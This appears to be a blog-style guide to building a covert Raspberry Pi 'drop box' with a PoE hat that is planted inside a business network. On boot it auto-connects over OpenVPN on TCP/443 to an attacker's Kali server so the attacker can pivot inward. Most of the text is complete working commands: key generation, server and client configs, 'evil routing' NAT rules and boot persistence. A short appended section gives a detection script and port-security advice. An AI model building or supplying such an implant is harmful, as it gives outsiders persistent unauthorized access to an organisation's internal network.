First, I have to say that I don’t condone running any of this and to use at your own risk. This is ONLY for research purposes and learning from attackers. So if you wanna act like Mr. Robot and disguise yourself as a janitor to go into some business to use this, it’s on you.
Got the idea from the Kali Linux guys' ISO of Doom.
Basically, I set up a Raspberry Pi loaded with Kali, with a PoE hat, that when plugged into some network will power on and auto-VPN to the host of your choosing. Then you could pivot deeper into the network. I think this is a cool method, because this device could easily be hidden behind a desk or under a table, and it doesn't need to boot on an existing computer. You just plug it in, turn it on and walk away.
I got the RPi 2B from RS Components, and the PoE hat from Pi-Supply.
Setup:
On your Kali VPN Server:
ssh-keygen
cp -rf /usr/share/easy-rsa/ vpn
cd vpn    # the easy-rsa scripts below run from inside the copied directory
source ./vars
./clean-all
./build-ca
./build-key-server server
./build-key client
./build-dh
cp keys/{server.crt,server.key,dh2048.pem,ca.crt} /etc/openvpn/
cd /etc/openvpn
cat << EOF > server.conf
tls-server
port 443
proto tcp
dev tap
ca ca.crt
cert server.crt
key server.key # This file should be kept secret
dh dh2048.pem
server 172.16.222.0 255.255.255.0
push "redirect-gateway def1 bypass-dhcp"
client-config-dir static
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
verb 3
EOF
mkdir -p static
cat << EOF > static/client
ifconfig-push 172.16.222.200 255.255.255.0
EOF
At this point, if you just want a plain OpenVPN server, run these commands:
sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"   # forwarding must be on or the FORWARD rules do nothing
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT   # server.conf uses dev tap, so the interface is tap0, not tun0
sudo iptables -A FORWARD -i tap0 -o eth0 -j ACCEPT
sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"
iptables-restore < /etc/iptables.ipv4.nat
For evil routing, skip the two steps above and create a script for easy VPN server startup:
cat << EOF > /root/vpn.sh
#!/bin/sh
openvpn --cd /etc/openvpn --config /etc/openvpn/server.conf &
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 172.16.222.0/24 -o eth0 -j MASQUERADE
EOF
chmod +x /root/vpn.sh
Or you can simply enable it through systemd:
systemctl enable openvpn@server
systemctl start openvpn@server
iptables -t nat -A POSTROUTING -s 172.16.222.0/24 -o eth0 -j MASQUERADE
sudo sh -c "iptables-save > /etc/iptables.evil.nat"
Then add this to /etc/rc.local so it comes back at boot:
echo 1 > /proc/sys/net/ipv4/ip_forward   # forwarding is needed for the MASQUERADE rule to route anything
iptables-restore < /etc/iptables.evil.nat
On the Raspberry Pi:
Download the Kali Pi image from Offsec and write it to the SD card with whatever method you want. I use Win32DiskImager because it's super easy.
Boot it up and allow root login in /etc/ssh/sshd_config (PermitRootLogin yes),
then SCP the ca.crt, client.crt and client.key files (from the vpn/keys directory built above) from the Kali server to /etc/openvpn/ on the RPi.
Also SCP your /root/.ssh/id_rsa.pub from the server to /root/.ssh/authorized_keys on the Pi, and then change the sshd config back to key-based root login only.
Create the client.conf file:
cat << EOF > /etc/openvpn/client.conf
client
dev tap
proto tcp
remote a.b.c.d 443 # remote server IP
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
ns-cert-type server # deprecated in OpenVPN 2.4 and dropped later; use "remote-cert-tls server" there
comp-lzo
verb 3
EOF
Then I just created this little script:
cat << EOF > /root/vpn.sh
#!/bin/sh
openvpn --cd /etc/openvpn --config /etc/openvpn/client.conf &
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 172.16.222.0/24 -o eth0 -j MASQUERADE
EOF
chmod +x /root/vpn.sh
And add /root/vpn.sh to /etc/rc.local
If you plug this in somewhere with power over Ethernet, it should boot and auto-VPN to the Kali server above.
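For the other side of the fence, here is an added example (not from the original post) of how a network team could spot this box: it cross-references DHCP leases with flow records for the exact pattern the configs above produce, a Raspberry Pi OUI holding one long-lived outbound TCP/443 session to an external host. The record layouts and the internal address ranges are assumptions, not any vendor's format.

```python
"""Detection sketch for the drop box above: a Pi that boots on PoE and keeps a
persistent outbound OpenVPN session on TCP/443. Added example, not part of the
post; the record layouts below are constructed assumptions, not a vendor's format."""
from ipaddress import ip_address, ip_network

# Raspberry Pi OUIs from the IEEE registry (a Pi 2B ships with B8:27:EB);
# extend from the current registry.
PI_OUIS = {"B8:27:EB", "DC:A6:32", "E4:5F:01"}
# Your own address space (assumption); anything else counts as external.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed DHCP leases: "<ip> <mac> <hostname>"
DHCP_LEASES = """\
10.0.5.41 b8:27:eb:12:34:56 kali
10.0.5.42 3c:52:82:aa:bb:cc LAPTOP-FIN01
10.0.5.43 00:1a:2b:3c:4d:5e printer-2f
"""
# Constructed flow records: "<src_ip> <dst_ip> <dst_port> <proto> <duration_s>"
FLOWS = """\
10.0.5.41 203.0.113.10 443 tcp 86400
10.0.5.42 198.51.100.7 443 tcp 12
10.0.5.43 10.0.1.5 9100 tcp 4
10.0.5.43 203.0.113.99 443 tcp 7200
"""

def is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def find_suspects(leases=DHCP_LEASES, flows=FLOWS, min_duration=3600):
    """Return (src_ip, mac, dst_ip, tag) for long-lived outbound TCP/443 sessions
    to external hosts; a Raspberry Pi OUI on the source raises the confidence."""
    mac_of = {}
    for line in leases.splitlines():
        ip, mac, _host = line.split()
        mac_of[ip] = mac
    hits = []
    for line in flows.splitlines():
        src, dst, port, proto, dur = line.split()
        # The post's client uses proto tcp, port 443, keepalive and
        # resolv-retry infinite, so one session stays up for hours or days.
        if proto != "tcp" or port != "443" or int(dur) < min_duration:
            continue
        if not is_external(dst):
            continue
        mac = mac_of.get(src, "unknown")
        tag = "pi-oui+persistent-443" if mac.upper()[:8] in PI_OUIS else "persistent-443"
        hits.append((src, mac, dst, tag))
    return hits
```

Port security or 802.1X on the PoE ports stops the box before it gets a lease at all; the script above is for the case where it already has one.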